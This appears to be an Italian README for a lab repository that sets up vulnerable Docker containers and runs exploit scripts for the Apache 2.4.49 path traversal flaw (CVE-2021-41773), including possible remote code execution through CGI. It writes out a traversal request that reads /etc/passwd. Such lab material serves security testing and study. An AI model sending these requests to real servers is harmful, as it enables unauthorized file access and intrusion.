
Script di exploit per la vulnerabilità di directory traversal del server HTTP Apache 2.4.49 (CVE-2021-41773), che consente path traversal e potenziale RCE tramite richieste HTTP modificate.
docker-compose up -d --build vuln-server-no-cgid
python no-cgid/exploit.py
docker-compose up -d --build vuln-server-cgid-sh
python cgid-sh/exploit.py
Vulnerabilità di directory traversal in Apache HTTP Server 2.4.49. Si verifica quando Require all denied non è impostato.
Quando riceve un URL codificato con %2e, consente l'accesso alle directory di livello superiore. Esempio: GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Se CGI è abilitato, è possibile RCE.
Esiste la vulnerabilità di Apache HTTP Server 2.4.50 CVE-2021-42013, dovuta a una correzione insufficiente di questa vulnerabilità.